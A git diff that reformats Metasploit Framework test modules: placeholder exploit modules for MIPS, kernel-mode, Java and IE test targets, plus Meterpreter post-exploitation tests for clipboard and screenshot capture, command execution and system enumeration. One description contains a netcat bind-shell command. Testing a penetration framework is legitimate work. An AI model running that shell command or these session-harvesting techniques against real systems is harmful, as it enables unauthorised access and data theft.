],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'BrowserRequirements' =>
|
'BrowserRequirements' => {
|
||||||
{
|
:source => /script/i,
|
||||||
:source => /script/i,
|
|
||||||
:os_name => OperatingSystems::WINDOWS,
|
:os_name => OperatingSystems::WINDOWS,
|
||||||
:ua_name => HttpClients::IE,
|
:ua_name => HttpClients::IE,
|
||||||
:ua_ver => '11.0'
|
:ua_ver => '11.0'
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
[ 'Automatic', {} ]
|
||||||
[ 'Automatic', { } ]
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => '2014-03-28',
|
'DisclosureDate' => '2014-03-28',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_html
|
def exploit_html
|
||||||
|
|
|
@ -3,51 +3,50 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'MIPS Aggressive Test Exploit',
|
update_info(
|
||||||
'Description' => 'This module tests the exploitation of a test service',
|
info,
|
||||||
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
|
'Name' => 'MIPS Aggressive Test Exploit',
|
||||||
'License' => MSF_LICENSE,
|
'Description' => 'This module tests the exploitation of a test service',
|
||||||
#'Arch' => ARCH_MIPSBE,
|
'Author' => ['skape', 'Julien Tinnes <julien[at]cr0.org>'],
|
||||||
'Payload' =>
|
'License' => MSF_LICENSE,
|
||||||
{
|
# 'Arch' => ARCH_MIPSBE,
|
||||||
'MaxNops' => 0,
|
'Payload' => {
|
||||||
#'BadChars' => "\x00",
|
'MaxNops' => 0,
|
||||||
#'StackAdjustment' => -3500,
|
# 'BadChars' => "\x00",
|
||||||
|
# 'StackAdjustment' => -3500,
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
# Target 0: Universal
|
# Target 0: Universal
|
||||||
[
|
[
|
||||||
'Mips big endian',
|
'Mips big endian',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE
|
'Arch' => ARCH_MIPSBE
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Mips big endian cannot be encoded',
|
'Mips big endian cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE,
|
'Arch' => ARCH_MIPSBE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
], [
|
], [
|
||||||
'Mips big endian encoder needed',
|
'Mips big endian encoder needed',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSBE,
|
'Arch' => ARCH_MIPSBE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
|
@ -57,43 +56,44 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Mips little endian',
|
'Mips little endian',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE
|
'Arch' => ARCH_MIPSLE
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
[
|
[
|
||||||
'Mips little endian cannot be encoded',
|
'Mips little endian cannot be encoded',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE,
|
'Arch' => ARCH_MIPSLE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
'BadChars' => (0..255).to_a.map { |x| x.chr }.to_s
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
], [
|
], [
|
||||||
'Mips little endian encoder needed',
|
'Mips little endian encoder needed',
|
||||||
{
|
{
|
||||||
'Platform' => [ 'linux', 'win' ],
|
'Platform' => [ 'linux', 'win' ],
|
||||||
'Arch' => ARCH_MIPSLE,
|
'Arch' => ARCH_MIPSLE,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => "\x00"
|
'BadChars' => "\x00"
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
|
|
||||||
|
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ]),
|
||||||
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
OptInt.new('TestInteger', [ false, "Testing an integer value", nil ])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
false
|
false
|
||||||
end
|
end
|
||||||
|
@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
# Show disassembled payload for context encoder test
|
# Show disassembled payload for context encoder test
|
||||||
if target.name =~ /context encoder/
|
if target.name =~ /context encoder/
|
||||||
#puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
# puts Rex::Assembly::Nasm.disassemble(payload.encoded[0,40])
|
||||||
#FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
# FIXME: do this with metasm for MIPS (import new metasm version which fixes current bug!)
|
||||||
end
|
end
|
||||||
|
|
||||||
connect
|
connect
|
||||||
|
|
|
@ -8,30 +8,35 @@ require 'rex'
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
def initialize( info = {} )
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Exec',
|
update_info(
|
||||||
'Description' => %q{ },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Exec',
|
||||||
'Author' => [ 'egypt' ],
|
'Description' => %q{ },
|
||||||
'References' => [ ],
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => [ 'java', 'linux' ],
|
'Author' => [ 'egypt' ],
|
||||||
'Arch' => ARCH_JAVA,
|
'References' => [ ],
|
||||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
'Platform' => [ 'java', 'linux' ],
|
||||||
'Targets' =>
|
'Arch' => ARCH_JAVA,
|
||||||
[
|
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||||
[ 'Generic (Java Payload)', {
|
'Targets' => [
|
||||||
'Arch' => ARCH_JAVA,
|
[
|
||||||
'Platform' => 'java'
|
'Generic (Java Payload)', {
|
||||||
} ],
|
'Arch' => ARCH_JAVA,
|
||||||
[ 'Linux', {
|
'Platform' => 'java'
|
||||||
'Arch' => ARCH_X86,
|
}
|
||||||
'Platform' => 'linux'
|
],
|
||||||
} ],
|
[
|
||||||
|
'Linux', {
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
'Platform' => 'linux'
|
||||||
|
}
|
||||||
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
))
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -47,4 +52,3 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,28 +1,30 @@
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpServer::HTML
|
include Msf::Exploit::Remote::HttpServer::HTML
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "IE Test for Javascript Libs",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
Tests Javascript hotness
|
'Name' => "IE Test for Javascript Libs",
|
||||||
},
|
'Description' => %q{
|
||||||
'License' => MSF_LICENSE,
|
Tests Javascript hotness
|
||||||
'Author' => [ 'sinn3r' ],
|
},
|
||||||
'References' => [ [ 'URL', 'https://metasploit.com' ] ],
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'win',
|
'Author' => [ 'sinn3r' ],
|
||||||
'Targets' => [ [ 'Automatic', {} ] ],
|
'References' => [ [ 'URL', 'https://metasploit.com' ] ],
|
||||||
'Payload' =>
|
'Platform' => 'win',
|
||||||
{
|
'Targets' => [ [ 'Automatic', {} ] ],
|
||||||
'BadChars' => "\x00",
|
'Payload' => {
|
||||||
|
'BadChars' => "\x00",
|
||||||
'StackAdjustment' => -3500
|
'StackAdjustment' => -3500
|
||||||
},
|
},
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
'DisclosureDate' => '2013-04-01',
|
'DisclosureDate' => '2013-04-01',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_base64
|
def test_base64
|
||||||
|
@ -72,12 +74,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
# Change the following to a specific function
|
# Change the following to a specific function
|
||||||
js = test_base64
|
js = test_base64
|
||||||
|
|
||||||
|
|
||||||
html = %Q|
|
html = %Q|
|
||||||
<!doctype html>
|
<!doctype html>
|
||||||
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
|
||||||
|
@ -95,8 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
</html>
|
</html>
|
||||||
|
|
|
|
||||||
|
|
||||||
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
|
send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache' })
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -3,7 +3,6 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# This is a test exploit for testing kernel-mode payloads.
|
# This is a test exploit for testing kernel-mode payloads.
|
||||||
#
|
#
|
||||||
|
@ -14,39 +13,40 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::KernelMode
|
include Msf::Exploit::KernelMode
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Internal Kernel-mode Test Exploit',
|
update_info(
|
||||||
'Description' =>
|
info,
|
||||||
"This module tests the exploitation of a kernel-mode test service.",
|
'Name' => 'Internal Kernel-mode Test Exploit',
|
||||||
'Author' => 'skape',
|
'Description' => "This module tests the exploitation of a kernel-mode test service.",
|
||||||
'License' => MSF_LICENSE,
|
'Author' => 'skape',
|
||||||
'Arch' => 'x86',
|
'License' => MSF_LICENSE,
|
||||||
'Payload' =>
|
'Arch' => 'x86',
|
||||||
{
|
'Payload' => {
|
||||||
'Space' => 1000,
|
'Space' => 1000,
|
||||||
'MaxNops' => 0,
|
'MaxNops' => 0,
|
||||||
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
|
||||||
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
|
'PrependEncoder' => "\x81\xC4\x0C\xFE\xFF\xFF" # add esp, -500
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' => [
|
||||||
[
|
|
||||||
[
|
[
|
||||||
'Windows XP SP2',
|
'Windows XP SP2',
|
||||||
{
|
{
|
||||||
'Ret' => 0x80502d7f, # jmp esp
|
'Ret' => 0x80502d7f, # jmp esp
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'ExtendedOptions' =>
|
'ExtendedOptions' =>
|
||||||
{
|
{
|
||||||
'Stager' => 'sud_syscall_hook',
|
'Stager' => 'sud_syscall_hook',
|
||||||
'Recovery' => 'spin'
|
'Recovery' => 'spin'
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
udp_sock.put(buf)
|
udp_sock.put(buf)
|
||||||
|
|
||||||
select(nil,nil,nil,2)
|
select(nil, nil, nil, 2)
|
||||||
|
|
||||||
disconnect_udp
|
disconnect_udp
|
||||||
end
|
end
|
||||||
|
|
|
@ -3,38 +3,39 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
class MetasploitModule < Msf::Exploit::Remote
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::Tcp
|
include Msf::Exploit::Remote::Tcp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Command Test',
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module tests cmd payloads by targeting (for example) a server
|
'Name' => 'Command Test',
|
||||||
like: nc -l -p 31337 -e /bin/sh
|
'Description' => %q{
|
||||||
},
|
This module tests cmd payloads by targeting (for example) a server
|
||||||
'Author' => 'egypt',
|
like: nc -l -p 31337 -e /bin/sh
|
||||||
'References' => [ ],
|
|
||||||
'DefaultOptions' => { },
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
},
|
},
|
||||||
'Platform' => 'unix',
|
'Author' => 'egypt',
|
||||||
'Arch' => ARCH_CMD,
|
'References' => [ ],
|
||||||
'Targets' =>
|
'DefaultOptions' => {},
|
||||||
[
|
'Payload' => {
|
||||||
[ 'Automatic Targeting', { } ],
|
},
|
||||||
|
'Platform' => 'unix',
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Automatic Targeting', {} ],
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
))
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(31337),
|
Opt::RPORT(31337),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def autofilter
|
def autofilter
|
||||||
|
|
|
@ -9,13 +9,16 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => 'Meterpreter cmd_exec test',
|
update_info(
|
||||||
'Description' => %q( This module will test the meterpreter cmd_exec API ),
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Meterpreter cmd_exec test',
|
||||||
'Platform' => ['windows', 'linux', 'unix'],
|
'Description' => %q( This module will test the meterpreter cmd_exec API ),
|
||||||
'SessionTypes' => ['meterpreter']
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Platform' => ['windows', 'linux', 'unix'],
|
||||||
|
'SessionTypes' => ['meterpreter']
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_cmd_exec
|
def test_cmd_exec
|
||||||
|
@ -107,6 +110,5 @@ class MetasploitModule < Msf::Post
|
||||||
output == test_string
|
output == test_string
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
|
@ -9,23 +8,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Meterpreter ExtAPI Stuff',
|
update_info(
|
||||||
'Description' => %q{ This module will test Windows Extended API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Meterpreter ExtAPI Stuff',
|
||||||
'Author' => [ 'Ben Campbell'],
|
'Description' => %q{ This module will test Windows Extended API methods },
|
||||||
'Platform' => [ 'windows', ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'Ben Campbell'],
|
||||||
))
|
'Platform' => [ 'windows', ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Check the extension is loaded...
|
# Check the extension is loaded...
|
||||||
#
|
#
|
||||||
def setup
|
def setup
|
||||||
|
|
||||||
unless session.extapi
|
unless session.extapi
|
||||||
vprint_status("Loading extapi extension...")
|
vprint_status("Loading extapi extension...")
|
||||||
begin
|
begin
|
||||||
|
@ -60,9 +60,9 @@ class MetasploitModule < Msf::Post
|
||||||
it "should return clipboard jpg dimensions" do
|
it "should return clipboard jpg dimensions" do
|
||||||
ret = false
|
ret = false
|
||||||
|
|
||||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||||
#VK_SNAPSHOT 44
|
# VK_SNAPSHOT 44
|
||||||
session.railgun.user32.keybd_event(44,0,0,0)
|
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||||
|
|
||||||
clipboard = session.extapi.clipboard.get_data(false)
|
clipboard = session.extapi.clipboard.get_data(false)
|
||||||
|
@ -96,22 +96,22 @@ class MetasploitModule < Msf::Post
|
||||||
text = Rex::Text.rand_text_alphanumeric(1024)
|
text = Rex::Text.rand_text_alphanumeric(1024)
|
||||||
ret = session.extapi.clipboard.set_text(text)
|
ret = session.extapi.clipboard.set_text(text)
|
||||||
clipboard = session.extapi.clipboard.get_data(true)
|
clipboard = session.extapi.clipboard.get_data(true)
|
||||||
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
|
ret = clipboard && clipboard.first && (clipboard.first[:type] == :text) && (clipboard.first[:data] == text)
|
||||||
end
|
end
|
||||||
|
|
||||||
if session.railgun.user32
|
if session.railgun.user32
|
||||||
it "should download clipboard jpg data" do
|
it "should download clipboard jpg data" do
|
||||||
ret = false
|
ret = false
|
||||||
|
|
||||||
#VK_PRINTSCREEN 154 Maybe needed on XP?
|
# VK_PRINTSCREEN 154 Maybe needed on XP?
|
||||||
#VK_SNAPSHOT 44
|
# VK_SNAPSHOT 44
|
||||||
session.railgun.user32.keybd_event(44,0,0,0)
|
session.railgun.user32.keybd_event(44, 0, 0, 0)
|
||||||
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
session.railgun.user32.keybd_event(44, 0, 'KEYEVENTF_KEYUP', 0)
|
||||||
|
|
||||||
clipboard = session.extapi.clipboard.get_data(true)
|
clipboard = session.extapi.clipboard.get_data(true)
|
||||||
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
|
if clipboard && clipboard.first && (clipboard.first[:type] == :jpg) && !(clipboard.first[:data].empty?)
|
||||||
# JPG Magic Bytes
|
# JPG Magic Bytes
|
||||||
ret = (clipboard.first[:data][0,2] == "\xFF\xD8")
|
ret = (clipboard.first[:data][0, 2] == "\xFF\xD8")
|
||||||
end
|
end
|
||||||
|
|
||||||
ret
|
ret
|
||||||
|
@ -183,14 +183,14 @@ class MetasploitModule < Msf::Post
|
||||||
windows = session.extapi.window.enumerate(true, nil)
|
windows = session.extapi.window.enumerate(true, nil)
|
||||||
|
|
||||||
if windows && windows.any?
|
if windows && windows.any?
|
||||||
unknowns = windows.select {|w| w[:title] == "<unknown>"}
|
unknowns = windows.select { |w| w[:title] == "<unknown>" }
|
||||||
ret = !unknowns.empty?
|
ret = !unknowns.empty?
|
||||||
end
|
end
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
parent = windows.select {|w| w[:title] =~ /program manager/i}
|
parent = windows.select { |w| w[:title] =~ /program manager/i }
|
||||||
|
|
||||||
if parent && parent.first
|
if parent && parent.first
|
||||||
it "should return an array of a windows children" do
|
it "should return an array of a windows children" do
|
||||||
|
|
|
@ -1,25 +1,27 @@
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
#load 'test/lib/module_test.rb'
|
# load 'test/lib/module_test.rb'
|
||||||
#load 'lib/rex/text.rb'
|
# load 'lib/rex/text.rb'
|
||||||
#load 'lib/msf/core/post/common.rb'
|
# load 'lib/msf/core/post/common.rb'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
include Msf::Post::Common
|
include Msf::Post::Common
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Post::Common Get Envs',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::Common get envs API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Post::Common Get Envs',
|
||||||
'Author' => [ 'Ben Campbell'],
|
'Description' => %q{ This module will test Post::Common get envs API methods },
|
||||||
'Platform' => [ 'windows', 'linux', 'java', 'python' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'Ben Campbell'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java', 'python' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_get_env_windows
|
def test_get_env_windows
|
||||||
|
@ -41,7 +43,7 @@ class MetasploitModule < Msf::Post
|
||||||
it "should return user" do
|
it "should return user" do
|
||||||
user = get_env('USER')
|
user = get_env('USER')
|
||||||
!user.blank?
|
!user.blank?
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should handle $ sign" do
|
it "should handle $ sign" do
|
||||||
user = get_env('$USER')
|
user = get_env('$USER')
|
||||||
|
@ -52,7 +54,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_get_envs
|
def test_get_envs
|
||||||
it "should return multiple envs" do
|
it "should return multiple envs" do
|
||||||
res = get_envs('PATH','USERNAME','USER')
|
res = get_envs('PATH', 'USERNAME', 'USER')
|
||||||
if session.platform =~ /win/i
|
if session.platform =~ /win/i
|
||||||
!res['PATH'].blank? && !res['USERNAME'].blank?
|
!res['PATH'].blank? && !res['USERNAME'].blank?
|
||||||
else
|
else
|
||||||
|
@ -62,4 +64,3 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Meterpreter Stuff',
|
update_info(
|
||||||
'Description' => %q{ This module will test meterpreter API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Meterpreter Stuff',
|
||||||
'Author' => [ 'egypt'],
|
'Description' => %q{ This module will test meterpreter API methods },
|
||||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'egypt'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -81,7 +84,7 @@ class MetasploitModule < Msf::Post
|
||||||
ret &&= (list && list.length > 0)
|
ret &&= (list && list.length > 0)
|
||||||
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
|
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
|
||||||
pid ||= session.sys.process.getpid
|
pid ||= session.sys.process.getpid
|
||||||
process = list.find{ |p| p['pid'] == pid }
|
process = list.find { |p| p['pid'] == pid }
|
||||||
vprint_status("PID info: #{process.inspect}")
|
vprint_status("PID info: #{process.inspect}")
|
||||||
ret &&= !(process.nil?)
|
ret &&= !(process.nil?)
|
||||||
else
|
else
|
||||||
|
@ -90,7 +93,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sys_config
|
def test_sys_config
|
||||||
|
@ -125,7 +127,7 @@ class MetasploitModule < Msf::Post
|
||||||
ifaces = session.net.config.get_interfaces
|
ifaces = session.net.config.get_interfaces
|
||||||
res = !!(ifaces and ifaces.length > 0)
|
res = !!(ifaces and ifaces.length > 0)
|
||||||
|
|
||||||
res &&= !! ifaces.find { |iface|
|
res &&= !!ifaces.find { |iface|
|
||||||
iface.addrs.find { |addr|
|
iface.addrs.find { |addr|
|
||||||
addr == session.session_host
|
addr == session.session_host
|
||||||
}
|
}
|
||||||
|
@ -141,13 +143,12 @@ class MetasploitModule < Msf::Post
|
||||||
routes and routes.length > 0
|
routes and routes.length > 0
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_fs
|
def test_fs
|
||||||
vprint_status("Starting filesystem tests")
|
vprint_status("Starting filesystem tests")
|
||||||
if datastore["AddEntropy"]
|
if datastore["AddEntropy"]
|
||||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||||
else
|
else
|
||||||
entropy_value = ""
|
entropy_value = ""
|
||||||
end
|
end
|
||||||
|
@ -252,7 +253,7 @@ class MetasploitModule < Msf::Post
|
||||||
res = true
|
res = true
|
||||||
